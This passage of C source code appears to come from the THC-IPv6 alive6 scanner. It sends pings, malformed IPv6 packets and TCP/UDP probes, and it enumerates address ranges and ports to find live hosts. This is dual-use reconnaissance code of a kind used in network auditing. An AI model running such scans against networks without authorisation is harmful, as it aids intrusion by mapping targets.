*/ 0, 0, 9, 9, 0, 0, 0xa, 0, /*to */ 0, 0, 0xf, 2, 0, 0, 0x80, 6, /*to */ 0, 0, 0x80, 0x1f, 0, 0, 0x200, 0, /*to */ 0, 0, 0x200, 3, 0, 0, 0x389, 0, /*to */ 0, 0, 0x389, 3, 0, 0, 0x443, 0, /*to */ 0, 0, 0x443, 3, 0, 0, 0x500, 0, /*to */ 0, 0, 0x500, 2, 0, 0, 0x666, 0, /*to */ 0, 0, 0x669, 2, 0, 0, 0x3128, 0, /*to */ 0, 0, 0x3128, 3, 0, 0, 0x6666, 0, /*to */ 0, 0, 0x6669, 2, 0, 0, 0x8080, 0, /*to */ 0, 0, 0x8080, 3, 0, 0, 0xdead, 0xbeef, /*to */ 0, 0, 0xdead, 0xbeef, // 0, 1, 0, 0, /*to */ 0, 3, 3, 3, 0, 0, 0, 0, /*to */ 4, 4, 4, 4, // some doubles here 1, 0, 0, 5, /*to */ 1, 0, 0, 0xf, // 2, 0, 1, 0, /*to */ 2, 0, 1, 3, 2, 0, 0, 5, /*to */ 2, 0, 0, 0xd, // 1, 2, 3, 4, /*to */ 1, 2, 3, 4, 5, 0, 0, 1, /*to */ 0xff, 0, 0, 2, 0xffff, 0x00ff, 0xfe00, 0xfffe, /*to */ 0xffff, 0x00ff, 0xfe00, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, /*to */ 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, /*to */ 0xffff, 0xffff, 0xffff, 0xffff }; // more keywords: // cafe, dead, beef, affe, b00b, babe, f00, fefe, ffff, 1337, 666, 0, 1 void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf ("Syntax: %s [-CMPSdlpv] [-I srcip6] [-i file] [-o file] [-e opt] [-s port,..] [-a port,..] [-u port,..] [-W TIME] interface [unicast-or-range-or-multicast-address]\n\n", prg); printf("Options:\n"); printf(" -i file check systems from input file\n"); printf(" -o file write results to output file\n"); printf(" -M enumerate hardware addresses (MAC) from input addresses (slow!)\n"); printf(" -C enumerate common address space from input addresses\n"); printf(" -4 ipv4/range test various IPv4 address encodings per network (1.2.3.4/24)\n"); printf(" -p send a ping packet for alive check (default)\n"); printf(" -e dst,hop send an errornous packets: destination (default), hop-by-hop\n"); printf(" -s port,port,.. TCP-SYN packet to ports for alive check or \"portscan\"\n"); printf(" -a port,port,.. TCP-ACK packet to ports for alive check\n"); printf(" -u port,port,.. UDP packet to ports for alive check\n"); printf(" -d DNS resolve alive IPv6 addresses\n"); if (do_help) { printf(" -n number how often to send each packet (default: local 1, remote 2)\n"); printf(" -W time time in ms to wait after sending a packet (default: %d)\n", waittime); printf(" -S slow mode, get best router for each remote target or when proxy-NA\n"); printf(" -I srcip6 use the specified IPv6 address as source\n"); printf(" -l use link-local address instead of global address\n"); printf(" -P only print addresses that would be scanned, no scanning\n"); printf(" -v verbose (twice: detailed, thrice: dumping packets)\n"); } else printf(" -h to display more command line options and help\n"); printf("\nTarget address on command line or in input file can include ranges in the form\n"); printf("of 2001:db8::1-fff or 2001:db8::1-2:0-ffff:0:0-ffff, etc.\n"); if (do_help) { printf("Do not use the ranges (from-to) option with -M, -C or -4.\n"); printf("If you specify a remote router, fragmentation+srcroute is performed.\n"); printf("Returns -1 on errors, 0 if a system was found alive or 1 if nothing was found.\n"); } exit(-1); } void check_packets(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { int i, ok = 0, len = header->caplen, offset = 0, nxt; unsigned char *ptr = (unsigned char *) data, *p1, *p2, *p3, sport[16] = "", *orig_dst = NULL; char *type = RESP_UNKNOWN, hopcount[20] = ""; if (!rawmode) { ptr += 14; len -= 14; } if (do_hdr_size) { ptr += (do_hdr_size - 14); len -= (do_hdr_size - 14); if ((ptr[0] & 240) != 0x60) return; } if (debug) thc_dump_data(ptr, len, "Received Packet"); if (len < 48 + sizeof(buf)) return; nxt = ptr[6]; // if the destination system sends source routed packets back, unlikely though // if (ptr[6] == NXT_ROUTE) // if ((offset = (ptr[41] + 1) * 8) + 48 + sizeof(buf) > len) // return; if (ptr[6 + offset] == NXT_FRAG) { nxt = ptr[40 + offset]; offset += 8; } if (still_not_there == 1) still_not_there = 0; if (nxt == NXT_ICMP6 && (do_ping || do_dst || do_hop || udpports[0] != -1)) { if (ptr[40 + offset] == ICMP6_PINGREPLY && (do_ping || do_dst || do_hop)) { if (tagging == NULL) { if (memcmp(ptr + 50 + offset, (char *) &si + _TAKE2, 2) == 0) { ok = 1; type = RESP_PONG; } } else { //printf("TAG: %s\n", ptr + 48 + offset); if (memcmp(ptr + 48 + offset, (char *) tagging, strlen(tagging)) == 0) { ok = 1; type = RESP_PONG; } } } else // if not a ping reply, its an error packet and the size is larger if (len < 96 + sizeof(buf)) return; if (ptr[40 + offset] == ICMP6_PARAMPROB && (do_dst || do_hop)) if (memcmp(ptr + len - 4, (char *) &si + _TAKE2, 2) == 0) { if (list == 0 && do_hop) ok = 2; else ok = 1; type = RESP_PARAMPROB; } if (ptr[40 + offset] == ICMP6_UNREACH && ptr[41 + offset] == 4 && udpports[0] != -1) if (memcmp(ptr + 88 + offset, (char *) &sp2 + _TAKE2, 2) == 0) { ok = 1; type = RESP_UNREACH_PORT; i = (ptr[90 + offset] << 8) + ptr[91 + offset]; snprintf(sport, sizeof(sport), "%d/", i); } } if (nxt == NXT_UDP && udpports[0] != -1) if (memcmp(ptr + 42 + offset, (char *) &sp2 + _TAKE2, 2) == 0) { ok = 1; type = RESP_UDP; } if (nxt == NXT_TCP && (portscan || synports[0] != -1 || ackports[0] != -1)) if (memcmp(ptr + 42 + offset, (char *) &sp2 + _TAKE2, 2) == 0) { ok = 1; i = ptr[41 + offset] + (ptr[40 + offset] << 8); snprintf(sport, sizeof(sport), "%d/", i); switch (ptr[53 + offset]) { case (TCP_SYN + TCP_ACK): type = RESP_SYNACK; break; case TCP_ACK: type = RESP_ACK; break; case TCP_RST: /* fall through */ case (TCP_RST + TCP_ACK): type = RESP_RST; if (rst_means_alive == 0) ok = 0; break; default: type = RESP_OTHER; } } if (ok == 0 && nxt == NXT_ICMP6) { ok = 2; switch (ptr[40 + offset]) { case 1: switch (ptr[41 + offset]) { case 0: type = RESP_UNREACH_ROUTE; break; case 1: type = RESP_UNREACH_FW; break; case 2: type = RESP_UNREACH_OOSCOPE; break; case 3: type = RESP_UNREACH_ADDR; break; case 4: type = RESP_UNREACH_PORT; break; case 5: type = RESP_UNREACH_GRESS; break; case 6: type = RESP_UNREACH_REJECT; break; default: ok = 0; } break; case 2: type = RESP_TOOBIG; break; case 3: type = RESP_TTLEXCEED; break; case 4: type = RESP_PARAMPROB; break; case 137: type = RESP_REDIR; break; default: ok = 0; } if (ok == 0) { type = RESP_ERROR; snprintf(sport, sizeof(sport), "%d:%d/", ptr[40], ptr[41]); ok = 2; } else orig_dst = thc_ipv62notation(ptr + 72 + offset); } i = 0; if (verbose < 2) while (ok && i < alive_no) { if (memcmp(alive[i], ptr + 8 + offset, 16) == 0) ok = 0; i++; } if (ok) { if (do_hopcount) sprintf(hopcount, " {hop count: %d}", ptr[7]); if (portscan == 0 || (portscan && (verbose > 2 || (type != RESP_UNREACH_PORT && type != RESP_UNREACH_FW)))) { if (resolve) he = gethostbyaddr(ptr + 8, 16, AF_INET6); p2 = thc_ipv62notation(ptr + 8); printf("Alive: %s%s%s%s [%s%s%s%s]%s\n", p2, resolve ? " (" : "", resolve && he != NULL ? he->h_name : "", resolve ? ")" : "", sport, type, orig_dst != NULL ? " for " : "", orig_dst != NULL ? (char *) orig_dst : "", hopcount); if (out != NULL) fprintf(out, "%s%s%s%s\n", p2, resolve ? " (" : "", (resolve && he != NULL) ? he->h_name : "", resolve ? ")" : ""); free(p2); if (orig_dst != NULL) free(orig_dst); if (alive_no < MAX_ALIVE && (alive[alive_no] = malloc(16)) != NULL) { memcpy(alive[alive_no], ptr + 8, 16); alive_no++; if (alive_no == MAX_ALIVE) fprintf(stderr, "Warning: more than %d alive systems detected, disabling double results check!\n", MAX_ALIVE); } } } else if (verbose && len >= 96 + sizeof(buf) && nxt == NXT_ICMP6 && ptr[41 + offset] != 4 && ptr[40 + offset] < 4 && ptr[40 + offset] > 0 && ptr[40 + 8 + offset + 6] == NXT_ICMP6) { if (memcmp(ptr + len - 4, (char *) &si + _TAKE2, 2) == 0) { if (resolve) he = gethostbyaddr(ptr + 8, 16, AF_INET6); p2 = thc_ipv62notation(ptr + 8); p3 = thc_ipv62notation(ptr + 24 + 40 + 8 + offset); switch (ptr[40 + offset]) { case 1: p1 = "unreachable"; break; case 2: p1 = "toobig"; break; case 3: p1 = "time-to-live-exceeded"; break; } printf("Warning: %s%s%s%s sent an ICMP %s for %s\n", p2, resolve ? " (" : "", resolve && he != NULL ? he->h_name : "", resolve ? ")" : "", p1, p3); free(p2); free(p3); } } if (still_not_there == 0) { if (ok != 1) still_not_there = 1; else still_not_there = -1; } } void get_ports_from_cmdline(int ports[], char *plist, char param) { int p, c = 0; char mylist[strlen(plist + 1)], *ptr, *ptr2; if (strtok(plist, "0123456789,") != NULL) { fprintf(stderr, "Error: ports must be defined by numbers and separated by a comma, e.g. \"-%c 22,53,80\"\n", param); exit(-1); } strcpy(mylist, plist); ptr = mylist; do { if (c >= MAX_PORTS) { fprintf(stderr, "Error: a maximum number of %d ports can be specified\n", MAX_PORTS); exit(-1); } if ((ptr2 = index(ptr, ',')) != NULL) *ptr2++ = 0; p = atoi(ptr); if (p < 0 || p > 65535) { // allow port zero fprintf(stderr, "Error: ports must be between 0 and 65535: %s\n", ptr); exit(-1); } ports[c] = p % 65536; c++; ptr = ptr2; } while (ptr2 != NULL); } int adress4to6(unsigned char *addr6, unsigned int addr4, char *state) { unsigned char a, b, c, d; a = (addr4 >> 24) % 256; b = (addr4 >> 16) % 256; c = (addr4 >> 8) % 256; d = addr4 % 256; memset(addr6 + 8, 0, 8); switch(*state) { case 0: addr6[15] = d; break; case 1: if (d > 9) { // is hex different to decimal? addr6[14] = (d / 100); d = d % 100; if (d > 9) d = (d / 10) * 16 + (d % 10); addr6[15] = d; break; } else *state += 1; // otherwise fall through case 2: addr6[9] = a; addr6[11] = b; addr6[13] = c; addr6[15] = d; break; case 3: if (d > 9 || c > 9 || b > 9 || a > 9) { // is hex different to decimal? addr6[8] = (a / 100); a = a % 100; if (a > 9) a = (a / 10) * 16 + (a % 10); addr6[9] = a; addr6[10] = (b / 100); b = b % 100; if (b > 9) b = (b / 10) * 16 + (b % 10); addr6[11] = b; addr6[12] = (c / 100); c = c % 100; if (c > 9) c = (c / 10) * 16 + (c % 10); addr6[13] = c; addr6[14] = (d / 100); d = d % 100; if (d > 9) d = (d / 10) * 16 + (d % 10); addr6[15] = d; break; } else *state += 1; // otherwise fall through case 4: addr6[12] = a; addr6[13] = b; addr6[14] = c; addr6[15] = d; *state += 1; return 1; // end of state reached break; // not reached default: fprintf(stderr, "Error: invalid address4to6 state %d!\n", *state); exit(-1); } *state += 1; return 0; } int main(int argc, char *argv[]) { unsigned char string[128]; // = "ip6 and dst "; unsigned char *pkt = NULL, *router6 = NULL, *cur_dst, *p2, *p3, *smac, buf2[6]; unsigned char *multicast6 = NULL, *src6 = NULL, *mac = NULL, *rmac = NULL, *routers[2]; int pkt_len = 0, prefer = PREFER_GLOBAL, fromto = 0, dictptr = 0, offset = 14; int enumerate_mac = 0, enumerate_dhcp = 0, i, j, k, l, cur_enum = 0, print_only = 0; int slow = 0, no_vendid = 0, no_nets = 0, local = -1, no_send = 1, no_send_local = 1, no_send_remote = 2, nos = 0; char *interface = NULL, *input = NULL, *output = NULL, line[128], line2[128], *ptr, *ptr2, *ptr3, do_router = 0, ok; unsigned int four_from[MAX_FOUR], four_to[MAX_FOUR], addr_cur; unsigned char fcnt = 0, bh, bm, bl, restart, use_dmac = 0, dump_all = 0; unsigned short int ip1, ip2, ip3, ip4, cip1, cip2, cip3, cip4, cip5, cip6, cip7, cip8; unsigned short int fip1, fip2, fip3, fip4, fip5, fip6, fip7, fip8, tip1, tip2, tip3, tip4, tip5, tip6, tip7, tip8; unsigned char vendid[MAX_VENDID][11], nets[MAX_NETS][8], orig_dst[16], dmac[27] = { 0, 0, 0, 0, 0, 0, 0 }; in_addr_t addr4; // unsigned char dns4buf[] = { 0xde, 0xad, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, // 0x00, 0x00, 0x00, 0x00, 0x09, 0x6c, 0x6f, 0x63, 0x61, 0x6c, // 0x68, 0x6f, 0x73, 0x74, 0x00, 0x00, 0x01, 0x00, 0x01 }; unsigned char dns6buf[] = { 0xba, 0xbe, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x09, 0x6c, 0x6f, 0x63, 0x61, 0x6c, 0x68, 0x6f, 0x73, 0x74, 0x00, 0x00, 0x1c, 0x00, 0x01 }; thc_ipv6_hdr *hdr; time_t passed; pcap_t *p; FILE *in = NULL; time_t timeval; for (i = 0; i < MAX_PORTS; i++) udpports[i] = ackports[i] = synports[i] = -1; if (argc == 1) help(argv[0]); j = 0; while ((i = getopt(argc, argv, "RhH4:W:w:PSLFdrlMDCn:i:o:pvs:a:u:e:VZ:I:Xx:T:")) >= 0) { switch (i) { case 'h': do_help = 1; help(argv[0]); break; // not reached case 'H': do_hopcount = 1; break; case 'R': rst_means_alive = 0; break; case 'P': print_only = 1; break; case '4': if (fcnt >= MAX_FOUR) { fprintf(stderr, "Error: maximum number of IPv4 addresses supported is %d!\n", MAX_FOUR); exit(-1); } if ((ptr = index(optarg, '/')) == NULL) { if ((addr4 = inet_addr(optarg)) == 0xffffffff) { fprintf(stderr, "Error: option is not a valid IPv4 address: %s\n", optarg); exit(-1); } four_from[fcnt] = htonl(addr4); four_to[fcnt] = htonl(addr4); fcnt++; } else { if ((ptr2 = malloc(strlen(optarg) + 1)) == NULL) { fprintf(stderr, "Error: can not allocate memory\n"); exit(-1); } strcpy(ptr2, optarg); ptr = index(ptr2, '/'); *ptr++ = 0; if ((k = atoi(ptr)) < 8 || k > 31) { fprintf(stderr, "Error: network size may only be between /8 and /31: %s\n", optarg); exit(-1); } if ((addr4 = htonl(inet_addr(ptr2))) == 0xffffffff) { fprintf(stderr, "Error: option is not a valid IPv4 address: %s\n", ptr2); exit(-1); } free(ptr2); l = 1 << (32 - k); l--; four_to[fcnt] = (addr4 | l); l = 0xffffffff - l; four_from[fcnt] = (addr4 & l); fcnt++; } break; case 'T': tagging = optarg; break; case 'Z': use_dmac = 1; sscanf(optarg, "%x:%x:%x:%x:%x:%x", (unsigned int *) &dmac[0], (unsigned int *) &dmac[1], (unsigned int *) &dmac[2], (unsigned int *) &dmac[3], (unsigned int *) &dmac[4], (unsigned int *) &dmac[5]); break; case 'w': case 'W': waittime = atoi(optarg) * 1000; break; case 'S': slow = 1; break; case 'L': ndp_only = 1; break; case 'V': debug = 1; break; case 'F': do_ping = 1; do_dst = 1; do_hop = 1; udpports[0] = 53; ackports[0] = 9511; synports[0] = 22; synports[1] = 25; synports[2] = 80; synports[3] = 443; synports[4] = 9511; break; case 'd': resolve = 1; break; case 'r': thc_ipv6_rawmode(1); rawmode = 1; break; case 'l': prefer = PREFER_LINK; break; case 'M': enumerate_mac = 1; break; case 'D': case 'C': enumerate_dhcp = 1; break; case 'n': no_send_local = no_send_remote = atoi(optarg); break; case 'I': if ((src6 = thc_resolve6(optarg)) == NULL) { fprintf(stderr, "Error: unable to resolve IPv6 source address %s\n", optarg); exit(-1); } break; case 'i': input = optarg; list++; if (curr == 0) curr = 1; break; case 'o': output = optarg; break; case 'p': do_ping = 1; j = (j | 1); break; case 'v': verbose++; break; case 's': j = (j | 8); if (strcasecmp(optarg, "xxx") == 0 || strncasecmp(optarg, "port", 4) == 0 || strncasecmp(optarg, "scan", 4) == 0) { portscan = 1; if (verbose < 2) verbose = 2; } else get_ports_from_cmdline(synports, optarg, 's'); break; case 'a': j = (j | 8); get_ports_from_cmdline(ackports, optarg, 'a'); break; case 'u': j = (j | 8); get_ports_from_cmdline(udpports, optarg, 'u'); break; case 'e': if (index(optarg, ',') != 0) { do_dst = 1; do_hop = 1; j = (j | 6); } else { if (strncasecmp(optarg, "dst", 3) == 0 || strncasecmp(optarg, "dest", 4) == 0) { do_dst = 1; j = (j | 4); } if (strncasecmp(optarg, "hop", 3) == 0) { do_hop = 1; j = (j | 2); } if (do_hop + do_dst == 0) { fprintf(stderr, "Error: unknown options to error packet option: %s\n", optarg); exit(-1); } } break; case 'X': dump_all = 1; break; case 'x': srcport = atoi(optarg); break; default: fprintf(stderr, "Error: unknown option -%c\n", i); exit(-1); } } if (slow && ndp_only) { fprintf(stderr, "Error: you can not use the -S and -L options togther!\n"); exit(-1); } if (j) { // reset defaults if an alive check type was chosen if ((j & 1) == 0) do_ping = 0; if ((j & 2) == 0) do_hop = 0; if ((j & 4) == 0) do_dst = 0; } if (verbose > 1) fprintf(stderr, "Warning: -vv disables duplicate checks, every packet will be logged.\n"); if (no_send < 1 || no_send > 10) { fprintf(stderr, "Error: -n option may only be set between 1 and 10\n"); exit(-1); } if (waittime < 0) { fprintf(stderr, "Error: -W wait time is not a positive value\n"); exit(-1); } if (do_hdr_size) offset = do_hdr_size; interface = argv[optind]; if (argv[optind + 1] != NULL && argc >= optind + 2) { ptr = argv[optind + 1]; curr = 0; } else ptr = "ff02::1"; if (ptr != NULL) { // && (index(ptr, ':') == NULL || index(ptr, '-') == NULL)) { if (verbose > 1) printf("Resolving %s ...\n", ptr); multicast6 = thc_resolve6(ptr); // if it cant resolve - no problem } if (interface == NULL) { fprintf(stderr, "Error: no interface defined!\n"); exit(-1); } if (multicast6 != NULL && multicast6[0] == 0xfe && multicast6[1] == 0x80) prefer = PREFER_LINK; if (src6 == NULL) { i = _thc_ipv6_showerrors; if (multicast6 != NULL && multicast6[0] == 0xff && multicast6[1] == 0x02) _thc_ipv6_showerrors = 0; if ((src6 = thc_get_own_ipv6(interface, multicast6, prefer)) == NULL) { fprintf(stderr, "Error: no IPv6 address found for interface %s!\n", interface); exit(-1); } _thc_ipv6_showerrors = i; } if ((smac = thc_get_own_mac(interface)) == NULL) { fprintf(stderr, "Error: no mac address found for interface %s!\n", interface); exit(-1); } if (verbose) printf("Selected source address %s to scan %s\n", thc_ipv62notation(src6), ptr); if (argv[optind + 2] != NULL && argc >= optind + 3) { if (verbose > 1) printf("Resolving %s ...\n", argv[optind + 2]); router6 = thc_resolve6(argv[optind + 2]); do_router = 1; if (use_dmac) mac = dmac; else if ((mac = thc_get_mac(interface, src6, router6)) == NULL) { fprintf(stderr, "Error: could not resolve mac address for destination router %s\n", argv[optind + 2]); exit(-1); } } //strcat(string, thc_ipv62notation(src6)); sprintf(string, "dst %s", thc_ipv62notation(src6)); if (dump_all == 0) { if (portscan || synports[0] != -1 || udpports[0] != -1 || ackports[0] != -1) { strcat(string, " and ( icmp6 or "); if (udpports[0] != -1) strcat(string, "udp "); if (udpports[0] != -1 && (portscan || synports[0] != -1 || ackports[0] != -1)) strcat(string, "or "); if (portscan || synports[0] != -1 || ackports[0] != -1) strcat(string, "tcp "); strcat(string, ")"); } else strcat(string, " and icmp6"); } if (multicast6 != NULL && (enumerate_mac || enumerate_dhcp) && input == NULL && multicast6[0] == 0xff) { fprintf(stderr, "Warning: -M/-C options make no sense for multicast addresses and are ignored for these\n"); enumerate_dhcp = enumerate_mac = 0; } // make the sending buffer unique si = getpid() % 65536; if (srcport == -1) { sp = 1200 + si % 30000; sp2 = htons(sp); } else { sp = srcport; sp2 = htons(srcport); } memset(vendid, 0, sizeof(vendid)); memset(nets, 0, sizeof(nets)); memset(buf2, 0, sizeof(buf2)); memset(buf, 0, sizeof(buf)); buf2[0] = NXT_INVALID; buf2[1] = 1; if (tagging == NULL) { for (i = 0; i < sizeof(buf) / 2; i++) memcpy(buf + i * 2, (char *) &si + _TAKE2, 2); } else { if (strlen(tagging) > 8) tagging[8] = 0; for (i = 0; i < (sizeof(buf) / strlen(tagging)); i++) memcpy(buf + i*(strlen(tagging)), tagging, strlen(tagging)); } if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } if (input != NULL) if ((in = fopen(input, "r")) == NULL) { fprintf(stderr, "Error: coult not open file %s\n", input); exit(-1); } if (output != NULL) { if ((out = fopen(output, "w")) == NULL) { fprintf(stderr, "Error: could not create output file %s\n", output); exit(-1); } else setvbuf(out, NULL, _IONBF, 0); // dont buffer output to file - for immediate scripting } // cur_enum states: 0 = as-is, 2 = dhcp, 1 = mac, 3 = from-to, 4 = ipv4 // curr states: 0 = cmdline, 1.. = line no. in input file setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); if (verbose) { timeval = time(NULL); printf("Starting alive6 %s (c) 2013 by van Hauser / THC at %s\n", VERSION, ctime(&timeval)); } while (curr <= list) { ok = 1; local = -1; if (cur_enum == 0) { if (curr == 0) { // the command line target first - if present cur_dst = multicast6; } else { // input file processing, if present if (feof(in)) curr++; line[0] = 0; ptr = fgets(line, sizeof(line), in); ptr = NULL; line[sizeof(line) - 1] = 0; j = strlen(line); if (j > 0) if (line[j - 1] == '\n') { line[j - 1] = 0; j--; } if (j > 0) if (line[j - 1] == '\r') { line[j - 1] = 0; j--; } if (j > 0) { ptr = line + j - 1; while (*ptr == ' ' || *ptr == '\t') *ptr-- = 0; ptr = line; while (*ptr == ' ' || *ptr == '\t') ptr++; if (*ptr == '#') ptr = NULL; } else ok = 0; } // from here for both target input options if (ptr != NULL && (index(ptr, '-') != NULL && index(ptr, '.') == NULL) && index(ptr, ':') != NULL) { fromto = 1; cur_enum = 3; } else { if (ok && verbose > 1) printf("Resolving %s ...\n", ptr); if ((cur_dst = thc_resolve6(ptr)) == NULL) { if (ok) fprintf(stderr, "Warning: could not resolve %s, skipping\n", ptr); ok = 0; } else { memcpy(orig_dst, cur_dst, 16); local = thc_is_dst_local(interface, cur_dst); if (enumerate_dhcp || fcnt > 0) { /* if (local > 0) { if (cur_dst[0] != 0xff) if ((p2 = thc_ipv62notation(cur_dst)) != NULL) { fprintf(stderr, "Warning: enumeration on local address %s disabled, use ff02::1!\n", p2); free(p2); } } else*/ { i = 0; if (no_nets > 0) for (j = 0; j < no_nets; j++) if (memcmp(nets[j], cur_dst, 8) == 0) i = 1; if (i == 0) { if (enumerate_dhcp) cur_enum = 2; else cur_enum = 4; restart = 1; if (no_nets < MAX_NETS) { memcpy(nets[no_nets], cur_dst, 8); no_nets++; if (no_nets == MAX_NETS) fprintf(stderr, "Warning: more than %d networks found, disabling double network check!\n", MAX_VENDID); } } else { ok = -1; // already scanned } } } else if (enumerate_mac && cur_dst[11] == 0xff && cur_dst[12] == 0xfe) { i = 0; if (no_vendid > 0) for (j = 0; j < no_vendid; j++) if (memcmp(vendid[j], cur_dst, 11) == 0) i = 1; if (i == 0) { cur_enum = 1; restart = 1; } else ok = -1; // already scanned } else if (fcnt) { cur_enum = 4; restart = 1; } } } if (cur_enum == 0 && curr == 0) curr++; } else if (cur_enum == 1) { // enumeration of vendor-id keyspaces identified, lowest 3 bytes of ipv6 if (restart) { restart = 0; bl = bm = bh = 0; memcpy(cur_dst, orig_dst, 16); memset(cur_dst + 13, 0, 3); if (verbose) { p2 = thc_ipv62notation(cur_dst); printf("Info: started autoconfiguration address space scan on %s\n", p2); free(p2); } if (no_vendid < MAX_VENDID) { memcpy(vendid[no_vendid], cur_dst, 11); no_vendid++; if (no_vendid == MAX_VENDID) fprintf(stderr, "Warning: more than %d vendor ids found, disabling double vendor id check!\n", MAX_VENDID); } } else { if (bl == 255) { bl = 0; if (bm == 255) { bm = 0; bh++; cur_dst[13] = bh; } else { bm++; } cur_dst[14] = bm; } else { bl++; if (bh == 255 && bm == 255 && bl == 255) { if (fcnt) { cur_enum = 4; restart = 1; } else { cur_enum = 0; if (curr == 0) curr++; } } } } cur_dst[15] = bl; } else if (cur_enum == 2) { // enumeration of common dhcp6 address space, // using dict[] ranges, approx. 2200 addresses if (restart) { memcpy(cur_dst, orig_dst, 16); memset(cur_dst + 8, 0, 8); if (verbose) { p2 = thc_ipv62notation(cur_dst); printf("Info: started common address space scan on %s\n", p2); free(p2); } restart = 0; ip1 = ip2 = ip3 = ip4 = 0; // only because dict starts with 0 dictptr = 0; } else { if (ip4 < dict[dictptr + 7]) ip4++; else if (ip3 < dict[dictptr + 6]) { ip3++; ip4 = dict[dictptr + 3]; } else if (ip2 < dict[dictptr + 5]) { ip2++; ip3 = dict[dictptr + 2]; ip4 = dict[dictptr + 3]; } else if (ip1 < dict[dictptr + 4]) { ip1++; ip2 = dict[dictptr + 1]; ip3 = dict[dictptr + 2]; ip4 = dict[dictptr + 3]; } else { dictptr += 8; ip1 = dict[dictptr]; ip2 = dict[dictptr + 1]; ip3 = dict[dictptr + 2]; ip4 = dict[dictptr + 3]; } cur_dst[8] = ip1 / 256; cur_dst[9] = ip1 % 256; cur_dst[10] = ip2 / 256; cur_dst[11] = ip2 % 256; cur_dst[12] = ip3 / 256; cur_dst[13] = ip3 % 256; cur_dst[14] = ip4 / 256; cur_dst[15] = ip4 % 256; if (ip1 == ip2 && ip1 == ip3 && ip1 == ip4 && ip1 == 0xffff) { // end of dict if (enumerate_mac && orig_dst[11] == 0xff && orig_dst[12] == 0xfe) { i = 0; if (no_vendid > 0) for (j = 0; j < no_vendid; j++) if (memcmp(vendid[j], orig_dst, 11) == 0) i = 1; if (i == 0) { cur_enum = 1; restart = 1; } else cur_enum = 0; } else { if (fcnt) { cur_enum = 4; restart = 1; } else { cur_enum = 0; } } if (curr == 0 && cur_enum == 0) curr++; } } } else if (cur_enum == 4) { // -4 option if (restart) { // bl = return, bm = fcnt_counter, bh = state if (verbose) { p2 = thc_ipv62notation(cur_dst); printf("Info: started IPv4 address space scan on %s\n", p2); free(p2); } restart = 0; bl = bm = bh = 0; addr_cur = four_from[bm]; } memcpy(cur_dst, orig_dst, 16); bl = adress4to6(cur_dst, addr_cur, &bh); //printf("return %d, state now %d, fcnt is %d\n", bl, bh, bm); if (bl == 1) { // done addr_cur state addr_cur++; bh = 0; if (addr_cur > four_to[bm]) { bm++; if (bm < fcnt) { addr_cur = four_from[bm]; } else { cur_enum = 0; if (curr == 0) curr++; } } } } // else if (cur_enum == 3) { if (fromto) { fromto = 0; ok = 1; // init if (strlen(ptr) > 80) { ok = 0; } else { if (curr != 0) { memcpy(line2, line, 80); ptr = line2; line2[80] = 0; } memset(line, 0, 80); i = j = k = 0; while (i == 0) { while (ptr[k] != '-' && k < 80 && ptr[k] != 0) line[j++] = ptr[k++]; if (ptr[k] == '-') while (ptr[k] != ':' && k < 80 && ptr[k] != 0) k++; if (ptr[k] != ':') i = 1; } if (verbose > 1) printf("Resolving %s ...\n", line); //printf("ptr: %s, line %s, cur_dst %s, multicast6 %s\n", ptr, line, cur_dst, multicast6); if ((cur_dst = thc_resolve6(line)) == NULL) { ok = 0; } else { memset(line, 0, 80); j = k = strlen(ptr) - 1; while (i == 1) { while (ptr[k] != '-' && k >= 0 && ptr[k] != 0) line[j--] = ptr[k--]; if (ptr[k] == '-') while (ptr[k] != ':' && k >= 0 && ptr[k] != 0) k--; if (ptr[k] != ':') i = 0; } } ptr2 = &line[j + 1]; if (verbose > 1) printf("Resolving %s ...\n", ptr2); if ((ptr3 = thc_resolve6(ptr2)) == NULL) { ok = 0; } else { cip1 = fip1 = (cur_dst[0] << 8) + (unsigned char) cur_dst[1]; cip2 = fip2 = (cur_dst[2] << 8) + (unsigned char) cur_dst[3]; cip3 = fip3 = (cur_dst[4] << 8) + (unsigned char) cur_dst[5]; cip4 = fip4 = (cur_dst[6] << 8) + (unsigned char) cur_dst[7]; cip5 = fip5 = (cur_dst[8] << 8) + (unsigned char) cur_dst[9]; cip6 = fip6 = (cur_dst[10] << 8) + (unsigned char) cur_dst[11]; cip7 = fip7 = (cur_dst[12] << 8) + (unsigned char) cur_dst[13]; cip8 = fip8 = (cur_dst[14] << 8) + (unsigned char) cur_dst[15]; tip1 = (ptr3[0] << 8) + (unsigned char) ptr3[1]; tip2 = (ptr3[2] << 8) + (unsigned char) ptr3[3]; tip3 = (ptr3[4] << 8) + (unsigned char) ptr3[5]; tip4 = (ptr3[6] << 8) + (unsigned char) ptr3[7]; tip5 = (ptr3[8] << 8) + (unsigned char) ptr3[9]; tip6 = (ptr3[10] << 8) + (unsigned char) ptr3[11]; tip7 = (ptr3[12] << 8) + (unsigned char) ptr3[13]; tip8 = (ptr3[14] << 8) + (unsigned char) ptr3[15]; if (fip1 > tip1 || fip2 > tip2 || fip3 > tip3 || fip4 > tip4 || fip5 > tip5 || fip6 > tip6 || fip7 > tip7 || fip8 > tip8) ok = 0; if (ok && verbose) { p2 = thc_ipv62notation(cur_dst); p3 = thc_ipv62notation(ptr3); printf("Info: started range address scan from %s to %s \n", p2, p3); free(p2); free(p3); } free(ptr3); } } if (ok) { memcpy(orig_dst, cur_dst, 16); } else { fprintf(stderr, "Error: range is invalid: %s, skipping\n", ptr); cur_enum = 0; if (curr == 0) curr++; } } else { if (cip8 < tip8) cip8++; else if (cip7 < tip7) { cip7++; cip8 = fip8; } else if (cip6 < tip6) { cip6++; cip7 = fip7; cip8 = fip8; } else if (cip5 < tip5) { cip5++; cip6 = fip6; cip7 = fip7; cip8 = fip8; } else if (cip4 < tip4) { cip4++; cip5 = fip5; cip6 = fip6; cip7 = fip7; cip8 = fip8; } else if (cip3 < tip3) { cip3++; cip4 = fip4; cip5 = fip5; cip6 = fip6; cip7 = fip7; cip8 = fip8; } else if (cip2 < tip2) { 